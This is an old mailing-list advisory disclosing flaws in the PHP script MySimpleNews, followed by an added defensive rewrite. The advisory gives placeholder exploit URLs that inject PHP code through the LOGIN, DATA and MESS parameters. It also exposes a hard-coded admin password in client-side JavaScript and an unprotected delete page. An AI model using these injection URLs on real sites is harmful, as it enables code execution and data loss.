From: Frog Man (leseulfrog_at_hotmail.com)
Date: Wed Oct 02 2002 - 15:17:53 CDT
Information :
°°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.
a) Writing PHP code in a PHP file and execution of this code.
Problem :
°°°°°°°°°
----------------- users.php -----------------
<?
$fp=fopen("news.php3","a");
fwrite($fp,"Posté Par [$LOGIN]\n");
fwrite($fp,"Le $DATA\n<br>");
fwrite($fp,"$MESS\n<hr>");
fclose($fp);
?>
----------------- users.php -----------------
Exploit :
°°°°°°°°°
http://[target]/users.php?LOGIN=[PHP code]
or
http://[target]/users.php?DATA=[PHP code]
or
http://[target]/users.php?MESS=[PHP code]
Execution : http://[target]/news.php3
b) Recovery of admin's password.
Problem :
°°°°°°°°°
------------------ admin.html ------------------
moncode = prompt('MySimpleNews - Administration','');
if (moncode != "[PASSWORD]")
{
location.href="about:Erreur 403";
}
------------------ admin.html ------------------
Exploit :
°°°°°°°°°
view-source:http://[target]/admin.html
c) Deleting news.
Problem :
°°°°°°°°°
No security in the file.
Exploit :
°°°°°°°°°
http://[target]/vider.php3
Patch :
°°°°°°°
Use of htaccess.
More details in French :
http://www.frog-man.org/tutos/MySimpleNews.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m
n
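
Added example, not part of the original post and not MySimpleNews code: one way to close problem a) is to stop appending request input to a file the server parses as PHP, and instead store posts as data and HTML-escape them when rendering. The file path, field limits, JSON-lines storage and function names below are assumptions made for illustration.

```php
<?php
// Added example, not MySimpleNews code. Posts are stored as JSON lines in a
// data file and HTML-escaped on output, so request input is never written
// into a file that the server executes as PHP.
// Assumption: a directory outside the web root, writable by the web server.
const NEWS_FILE = __DIR__ . '/../data/news.jsonl';

function clean_field(string $value, int $maxLen): string
{
    // Replace control characters with spaces; invalid UTF-8 yields ''.
    $value = preg_replace('/[\x00-\x1F\x7F]/u', ' ', $value) ?? '';
    return mb_substr(trim($value), 0, $maxLen); // needs the mbstring extension
}

function append_post(string $file, string $login, string $mess): bool
{
    $entry = [
        'login' => clean_field($login, 32),
        'date'  => date('Y-m-d H:i'), // set server-side, not read from DATA
        'mess'  => clean_field($mess, 2000),
    ];
    if ($entry['login'] === '' || $entry['mess'] === '') {
        return false;
    }
    $line = json_encode($entry, JSON_UNESCAPED_UNICODE) . "\n";
    return file_put_contents($file, $line, FILE_APPEND | LOCK_EX) !== false;
}

function render_posts(string $file): string
{
    $esc = fn($s) => htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
    $html = '';
    $lines = is_file($file) ? file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
    foreach ($lines ?: [] as $line) {
        $p = json_decode($line, true);
        if (!is_array($p)) {
            continue;
        }
        $html .= sprintf("Posté Par [%s]\nLe %s\n<br>%s\n<hr>",
            $esc($p['login'] ?? ''), $esc($p['date'] ?? ''), $esc($p['mess'] ?? ''));
    }
    return $html;
}

$in = fn(string $k) => is_string($_POST[$k] ?? null) ? $_POST[$k] : '';
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    http_response_code(append_post(NEWS_FILE, $in('LOGIN'), $in('MESS')) ? 200 : 400);
}
echo render_posts(NEWS_FILE);
```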